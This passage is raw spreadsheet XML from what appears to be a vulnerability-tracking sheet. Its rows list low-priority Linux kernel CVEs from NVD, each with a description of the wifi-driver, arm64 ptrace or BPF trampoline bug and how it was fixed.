wifi: mac80211: disconnect on CSA to channel 0
The refactor for the CSA parsing erroneously equates channel
zero and no information present, leading it to ignore a CSA
on an AP that advertises a switch to that (invalid) channel.
This leads to not disconnecting, which we should. For Intel
devices, this can lead to a firmware crash.
Fix this by using an int type for the channel number as well
as the opclass, and using a (negative) value that cannot be
encoded in the element to indicate it's not present.</t>
        </is>
      </c>
      <c r="T712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90344</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90345</t>
        </is>
      </c>
      <c r="D713" s="5" t="inlineStr"/>
      <c r="E713" s="5" t="inlineStr"/>
      <c r="F713" s="5" t="inlineStr"/>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="inlineStr"/>
      <c r="I713" s="5" t="inlineStr"/>
      <c r="J713" s="5" t="inlineStr"/>
      <c r="K713" s="5" t="inlineStr"/>
      <c r="L713" s="5" t="inlineStr"/>
      <c r="M713" s="5" t="inlineStr"/>
      <c r="N713" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O713" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P713" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q713" s="5" t="inlineStr"/>
      <c r="R713" s="5" t="inlineStr"/>
      <c r="S713" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: brcmfmac: fix P2P action frame handling without device vif
Some P2P action frame paths assume the P2P device vif is always
available. That is not true when userspace sends non-P2P public action
frames through the primary interface, or when action-frame abort runs
after the P2P device vif has not been created.
Fall back to the primary vif when aborting an action frame without a P2P
device vif, and guard P2P device saved IE access before using it for
peer channel search.</t>
        </is>
      </c>
      <c r="T713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90345</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90346</t>
        </is>
      </c>
      <c r="D714" s="5" t="inlineStr"/>
      <c r="E714" s="5" t="inlineStr"/>
      <c r="F714" s="5" t="inlineStr"/>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="inlineStr"/>
      <c r="I714" s="5" t="inlineStr"/>
      <c r="J714" s="5" t="inlineStr"/>
      <c r="K714" s="5" t="inlineStr"/>
      <c r="L714" s="5" t="inlineStr"/>
      <c r="M714" s="5" t="inlineStr"/>
      <c r="N714" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O714" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P714" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q714" s="5" t="inlineStr"/>
      <c r="R714" s="5" t="inlineStr"/>
      <c r="S714" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: nl80211: clean up color-change beacon data on errors
nl80211_color_change() calls nl80211_parse_beacon() for the beacon_next
template, which can allocate params.beacon_next.mbssid_ies and .rnr_ies.
A parsing failure returned directly instead of using the out: cleanup,
leaking any allocations completed before the error.
Allocate the nested attribute table before parsing beacon_next. Its
allocation failure can then return before beacon data exists, while a
later parsing failure uses out: to release the parsed data.</t>
        </is>
      </c>
      <c r="T714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90346</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90347</t>
        </is>
      </c>
      <c r="D715" s="5" t="inlineStr"/>
      <c r="E715" s="5" t="inlineStr"/>
      <c r="F715" s="5" t="inlineStr"/>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="inlineStr"/>
      <c r="I715" s="5" t="inlineStr"/>
      <c r="J715" s="5" t="inlineStr"/>
      <c r="K715" s="5" t="inlineStr"/>
      <c r="L715" s="5" t="inlineStr"/>
      <c r="M715" s="5" t="inlineStr"/>
      <c r="N715" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O715" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P715" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q715" s="5" t="inlineStr"/>
      <c r="R715" s="5" t="inlineStr"/>
      <c r="S715" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
arm64: ptrace: Keep 'orig_x0' in-sync with x0 on syscall entry
Commit e057b9477232 ("arm64: syscall: Ensure saved x0 is kept in-sync
with tracer updates") attempted to resolve a long-standing issue with
syscall entry tracing, where a tracer is able to manipulate the first
syscall argument without being subjected to seccomp or audit checking.
Unfortunately, that fix was incomplete [1], as it failed to update
'orig_x0' between a tracer updating x0 during a seccomp ptrace exit
(SECCOMP_RET_TRACE) and the seccomp filter being re-evaluated.
Rather than add hooks to the core seccomp code, instead move the
synchronisation code into the ptrace GPR and syscall setting code so
that 'orig_x0' is kept up to date with x0 whenever we're stopped on the
syscall entry path.</t>
        </is>
      </c>
      <c r="T715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90347</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90348</t>
        </is>
      </c>
      <c r="D716" s="5" t="inlineStr"/>
      <c r="E716" s="5" t="inlineStr"/>
      <c r="F716" s="5" t="inlineStr"/>
      <c r="G716" s="5" t="inlineStr"/>
      <c r="H716" s="5" t="inlineStr"/>
      <c r="I716" s="5" t="inlineStr"/>
      <c r="J716" s="5" t="inlineStr"/>
      <c r="K716" s="5" t="inlineStr"/>
      <c r="L716" s="5" t="inlineStr"/>
      <c r="M716" s="5" t="inlineStr"/>
      <c r="N716" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O716" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P716" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q716" s="5" t="inlineStr"/>
      <c r="R716" s="5" t="inlineStr"/>
      <c r="S716" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath10k: snoc: use memcpy_fromio() for MSA ramdump
On WCN3990/SNOC the MSA region is mapped with devm_memremap(MEMREMAP_WT).
On arm64 such a mapping is not Normal-cacheable, so unaligned accesses to
it are not permitted. ath10k_msa_dump_memory() copies the region with a
plain memcpy(), whose optimized __pi_memcpy_generic implementation issues
wide/unaligned loads. This triggers an alignment fault (FSC=0x21) Oops in
ath10k_snoc_fw_crashed_dump() while collecting the devcoredump:
  Unable to handle kernel paging request ... FSC=0x21: alignment fault
  pc : __pi_memcpy_generic
  lr : ath10k_snoc_fw_crashed_dump [ath10k_snoc]
The Oops both leaves the firmware RAM dump buffer zeroed (no dump is
captured) and crashes the kernel, which in turn breaks modem SSR
recovery.
Use memcpy_fromio(), which only performs accesses that are valid for such
a device-memory mapping. The generic memcpy_fromio() implementation aligns
the source before issuing word-sized reads and stores the destination with
put_unaligned(), so it is also safe for the coherent DMA allocation used on
the non-reserved-memory path. ath11k and ath12k use the same pattern
when copying target memory into crash dumps, so call it unconditionally
here too.
The MEMREMAP_WT pointer is a plain void *, so an explicit __iomem cast is
needed; use __force to keep sparse happy.
Tested-on: WCN3990 hw1.0 SNOC WLAN.HL.3.3.7.c5-00107-QCAHLSWMTPL-1</t>
        </is>
      </c>
      <c r="T716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90348</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90349</t>
        </is>
      </c>
      <c r="D717" s="5" t="inlineStr"/>
      <c r="E717" s="5" t="inlineStr"/>
      <c r="F717" s="5" t="inlineStr"/>
      <c r="G717" s="5" t="inlineStr"/>
      <c r="H717" s="5" t="inlineStr"/>
      <c r="I717" s="5" t="inlineStr"/>
      <c r="J717" s="5" t="inlineStr"/>
      <c r="K717" s="5" t="inlineStr"/>
      <c r="L717" s="5" t="inlineStr"/>
      <c r="M717" s="5" t="inlineStr"/>
      <c r="N717" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O717" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P717" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q717" s="5" t="inlineStr"/>
      <c r="R717" s="5" t="inlineStr"/>
      <c r="S717" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: fix out-of-bounds link array access in mt7996_tx()
When mac80211 leaves the link unspecified, mt7996_tx() substitutes the
primary link id of the station or vif. That value is
IEEE80211_LINK_UNSPECIFIED (0xf) until the first link has been added,
and it is then used unchecked to index vif-&gt;link_conf[],
mvif-&gt;mt76.link[] and sta-&gt;link[], all of which hold
IEEE80211_MLD_MAX_NUM_LINKS (15) entries.
Clamp the primary link id to the default link before using it, and use
the clamped value for the link_sta fallback as well.</t>
        </is>
      </c>
      <c r="T717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90349</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90350</t>
        </is>
      </c>
      <c r="D718" s="5" t="inlineStr"/>
      <c r="E718" s="5" t="inlineStr"/>
      <c r="F718" s="5" t="inlineStr"/>
      <c r="G718" s="5" t="inlineStr"/>
      <c r="H718" s="5" t="inlineStr"/>
      <c r="I718" s="5" t="inlineStr"/>
      <c r="J718" s="5" t="inlineStr"/>
      <c r="K718" s="5" t="inlineStr"/>
      <c r="L718" s="5" t="inlineStr"/>
      <c r="M718" s="5" t="inlineStr"/>
      <c r="N718" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O718" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P718" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q718" s="5" t="inlineStr"/>
      <c r="R718" s="5" t="inlineStr"/>
      <c r="S718" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: reject out-of-range link ids in mt76_vif_link()
mt76_vif_link() indexes mvif-&gt;link[] without validating link_id, but
callers pass mvif-&gt;deflink_id / msta-&gt;deflink_id, which hold
IEEE80211_LINK_UNSPECIFIED (0xf) until the first link has been added.
Since IEEE80211_MLD_MAX_NUM_LINKS is 15, that reads one element past the
end of the array, aliasing mt76_vif_data.offchannel_link.
Reachable via mt7996_set_tsf()/mt7996_offset_tsf() and
mt7996_net_fill_forward_path(). Bounds check link_id and return NULL,
matching mt7996_sta_link() and mt7996_sta_link_protected().</t>
        </is>
      </c>
      <c r="T718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90350</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90351</t>
        </is>
      </c>
      <c r="D719" s="5" t="inlineStr"/>
      <c r="E719" s="5" t="inlineStr"/>
      <c r="F719" s="5" t="inlineStr"/>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="inlineStr"/>
      <c r="I719" s="5" t="inlineStr"/>
      <c r="J719" s="5" t="inlineStr"/>
      <c r="K719" s="5" t="inlineStr"/>
      <c r="L719" s="5" t="inlineStr"/>
      <c r="M719" s="5" t="inlineStr"/>
      <c r="N719" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O719" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P719" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q719" s="5" t="inlineStr"/>
      <c r="R719" s="5" t="inlineStr"/>
      <c r="S719" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: do not attach hif2 WED when the main WED attach failed
If the WED attach for the primary PCIe function fails, the probe path
still attached wed_hif2 for the secondary function, leaving the device
in an inconsistent half-WED configuration that crashes later. The hif2
call also re-enabled hwrro_mode, which the failed primary attach had
just turned off.
Skip the hif2 WED setup when the primary WED device is not active.</t>
        </is>
      </c>
      <c r="T719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90351</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90352</t>
        </is>
      </c>
      <c r="D720" s="5" t="inlineStr"/>
      <c r="E720" s="5" t="inlineStr"/>
      <c r="F720" s="5" t="inlineStr"/>
      <c r="G720" s="5" t="inlineStr"/>
      <c r="H720" s="5" t="inlineStr"/>
      <c r="I720" s="5" t="inlineStr"/>
      <c r="J720" s="5" t="inlineStr"/>
      <c r="K720" s="5" t="inlineStr"/>
      <c r="L720" s="5" t="inlineStr"/>
      <c r="M720" s="5" t="inlineStr"/>
      <c r="N720" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O720" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P720" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q720" s="5" t="inlineStr"/>
      <c r="R720" s="5" t="inlineStr"/>
      <c r="S720" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: release hif2 reference on probe IRQ failure
The hif2 reference obtained by mt7915_pci_init_hif2() is only released on
error paths that key off dev-&gt;hif2, which is not assigned until after the
IRQ setup. If pci_alloc_irq_vectors() or the primary devm_request_irq()
fails, the reference leaks. Drop it explicitly on those paths via
mt7915_put_hif2().</t>
        </is>
      </c>
      <c r="T720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90352</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90353</t>
        </is>
      </c>
      <c r="D721" s="5" t="inlineStr"/>
      <c r="E721" s="5" t="inlineStr"/>
      <c r="F721" s="5" t="inlineStr"/>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="inlineStr"/>
      <c r="I721" s="5" t="inlineStr"/>
      <c r="J721" s="5" t="inlineStr"/>
      <c r="K721" s="5" t="inlineStr"/>
      <c r="L721" s="5" t="inlineStr"/>
      <c r="M721" s="5" t="inlineStr"/>
      <c r="N721" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O721" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P721" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q721" s="5" t="inlineStr"/>
      <c r="R721" s="5" t="inlineStr"/>
      <c r="S721" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: fix ext PHY use-after-free on register error path
After mt7915_register_ext_phy() succeeded, a failure of the main PHY
mt7915_init_debugfs() or mt7915_coredump_register() unwound through
free_phy2, which called ieee80211_free_hw() on the ext PHY hw while it
was still registered with mac80211, since mt76_unregister_device() only
unregisters the main hw. Unregister the ext PHY (thermal + phy + hw)
first and skip the redundant free.</t>
        </is>
      </c>
      <c r="T721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90353</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90354</t>
        </is>
      </c>
      <c r="D722" s="5" t="inlineStr"/>
      <c r="E722" s="5" t="inlineStr"/>
      <c r="F722" s="5" t="inlineStr"/>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="inlineStr"/>
      <c r="I722" s="5" t="inlineStr"/>
      <c r="J722" s="5" t="inlineStr"/>
      <c r="K722" s="5" t="inlineStr"/>
      <c r="L722" s="5" t="inlineStr"/>
      <c r="M722" s="5" t="inlineStr"/>
      <c r="N722" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O722" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P722" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q722" s="5" t="inlineStr"/>
      <c r="R722" s="5" t="inlineStr"/>
      <c r="S722" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: fix double hif2 init on the non-WED path
mt7915_pci_init_hif2() was called unconditionally and again inside the
WED-inactive branch. The helper increments the global hif_idx, writes the
PCIe RECOG_ID register and takes a get_device() reference via
mt7915_pci_get_hif2(), while removal only drops one reference. On non-WED
dual-hif hardware this double-incremented hif_idx, wrote RECOG_ID twice and
leaked a device reference. Only the call inside the WED-inactive branch is
correct; drop the unconditional one. hif2 is already initialised to NULL.</t>
        </is>
      </c>
      <c r="T722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90354</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90355</t>
        </is>
      </c>
      <c r="D723" s="5" t="inlineStr"/>
      <c r="E723" s="5" t="inlineStr"/>
      <c r="F723" s="5" t="inlineStr"/>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="inlineStr"/>
      <c r="I723" s="5" t="inlineStr"/>
      <c r="J723" s="5" t="inlineStr"/>
      <c r="K723" s="5" t="inlineStr"/>
      <c r="L723" s="5" t="inlineStr"/>
      <c r="M723" s="5" t="inlineStr"/>
      <c r="N723" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O723" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P723" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q723" s="5" t="inlineStr"/>
      <c r="R723" s="5" t="inlineStr"/>
      <c r="S723" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: clear stale link state on full reset
After a full chip reset, mac80211 reconfig replays interface, link and
channel context setup. mt7996_vif_link_add() short-circuits when the
link_id is still marked in mvif-&gt;valid_links, a state introduced for
postponing link teardown to interface removal. The reset path frees the
link structures without clearing those bits, so the replayed setup never
re-creates dev_info/bss_info/STA records in the restarted firmware and
never re-registers the link wcid, leaving the device inoperative.
The reset path also leaks every allocated MLD index: per-link indices
and the per-vif group/remap indices are re-allocated from scratch during
reconfig, but the old bits stay set in the masks, so repeated full
resets exhaust the index space.
Clear valid_links in the reset vif iterator and reset the MLD index
masks alongside the existing omac_mask clearing.</t>
        </is>
      </c>
      <c r="T723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90355</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90356</t>
        </is>
      </c>
      <c r="D724" s="5" t="inlineStr"/>
      <c r="E724" s="5" t="inlineStr"/>
      <c r="F724" s="5" t="inlineStr"/>
      <c r="G724" s="5" t="inlineStr"/>
      <c r="H724" s="5" t="inlineStr"/>
      <c r="I724" s="5" t="inlineStr"/>
      <c r="J724" s="5" t="inlineStr"/>
      <c r="K724" s="5" t="inlineStr"/>
      <c r="L724" s="5" t="inlineStr"/>
      <c r="M724" s="5" t="inlineStr"/>
      <c r="N724" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O724" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P724" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q724" s="5" t="inlineStr"/>
      <c r="R724" s="5" t="inlineStr"/>
      <c r="S724" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: free vif links after clearing wcid entries on full reset
mt7996_mac_reset_vif_iter() queues non-default vif links for kfree_rcu
while dev-&gt;wcid[] still holds pointers to the wcid embedded in each
freed link; mt76_reset_device() then dereferences those entries and
runs mt76_wcid_cleanup() on them. If a grace period elapses in between,
the cleanup operates on freed memory.
Run mt76_reset_device() first, so the wcid entries are cleaned up and
cleared while the links are still valid.</t>
        </is>
      </c>
      <c r="T724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90356</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90357</t>
        </is>
      </c>
      <c r="D725" s="5" t="inlineStr"/>
      <c r="E725" s="5" t="inlineStr"/>
      <c r="F725" s="5" t="inlineStr"/>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="inlineStr"/>
      <c r="I725" s="5" t="inlineStr"/>
      <c r="J725" s="5" t="inlineStr"/>
      <c r="K725" s="5" t="inlineStr"/>
      <c r="L725" s="5" t="inlineStr"/>
      <c r="M725" s="5" t="inlineStr"/>
      <c r="N725" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O725" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P725" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q725" s="5" t="inlineStr"/>
      <c r="R725" s="5" t="inlineStr"/>
      <c r="S725" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: unlink TWT flow if the MCU rejects the agreement
The flow is added to dev-&gt;twt_list before sending the agreement to the
firmware, but the error path leaves it linked while flowid_mask is
never set. The flow slot can then be reused and memset while still on
the list, corrupting twt_list, and station removal leaves a dangling
entry behind that mt7915_mac_twt_sched_list_add() later walks.</t>
        </is>
      </c>
      <c r="T725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90357</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90358</t>
        </is>
      </c>
      <c r="D726" s="5" t="inlineStr"/>
      <c r="E726" s="5" t="inlineStr"/>
      <c r="F726" s="5" t="inlineStr"/>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="inlineStr"/>
      <c r="I726" s="5" t="inlineStr"/>
      <c r="J726" s="5" t="inlineStr"/>
      <c r="K726" s="5" t="inlineStr"/>
      <c r="L726" s="5" t="inlineStr"/>
      <c r="M726" s="5" t="inlineStr"/>
      <c r="N726" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O726" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P726" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q726" s="5" t="inlineStr"/>
      <c r="R726" s="5" t="inlineStr"/>
      <c r="S726" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf, x86: Fix trampoline stack size for 128-bit arguments
btf_distill_func_proto() accepts a function argument up to 16 bytes, so a
128-bit scalar such as __int128 reaches the x86 trampoline with
arg_size == 16. But the current implementation assumes an __int128
argument only needs one register, so the register save area is
under-allocated and save_args() overwrites adjacent stack slots.
Compute the register count from arg_size for all arguments to fix it.</t>
        </is>
      </c>
      <c r="T726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90358</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90359</t>
        </is>
      </c>
      <c r="D727" s="5" t="inlineStr"/>
      <c r="E727" s="5" t="inlineStr"/>
      <c r="F727" s="5" t="inlineStr"/>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="inlineStr"/>
      <c r="I727" s="5" t="inlineStr"/>
      <c r="J727" s="5" t="inlineStr"/>
      <c r="K727" s="5" t="inlineStr"/>
      <c r="L727" s="5" t="inlineStr"/>
      <c r="M727" s="5" t="inlineStr"/>
      <c r="N727" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O727" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P727" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q727" s="5" t="inlineStr"/>
      <c r="R727" s="5" t="inlineStr"/>
      <c r="S727" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject &gt;8 byte return values on return-reading trampoline paths
btf_distill_func_proto() builds the function model used for the
fentry/fexit/fmod_ret/fsession trampolines and struct_ops. It has
accepted a 16-byte __int128 return value since the trampoline was
introduced: __get_type_size() returns the integer's type size, and the
return-type check only rejected ret &lt; 0.
But the BPF trampoline preserves only 8 bytes of the return value (RAX on
x86, i.e. R0). For an attach type that reads the target's return value the
second half (RDX / R3) is neither saved nor restored, so a program
attached to a function returning a 16-byte value corrupts the value seen
by the real caller and itself observes only half of it. struct_ops
trampolines have the same limitation.
This affects the attach types that read the target's return value: fexit,
fmod_ret and fsession (plus the _multi variants of fexit and fsession),
and struct_ops. fentry/fentry_multi run before the target returns and are
unaffected.
Reject a &gt;8 byte return value for these attach types in
bpf_check_attach_target() and bpf_check_attach_btf_id_multi(), and for
struct_ops in bpf_struct_ops_desc_init().</t>
        </is>
      </c>
      <c r="T727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90359</t>
        </is>
      </c>
    </row>
    <row r="728">
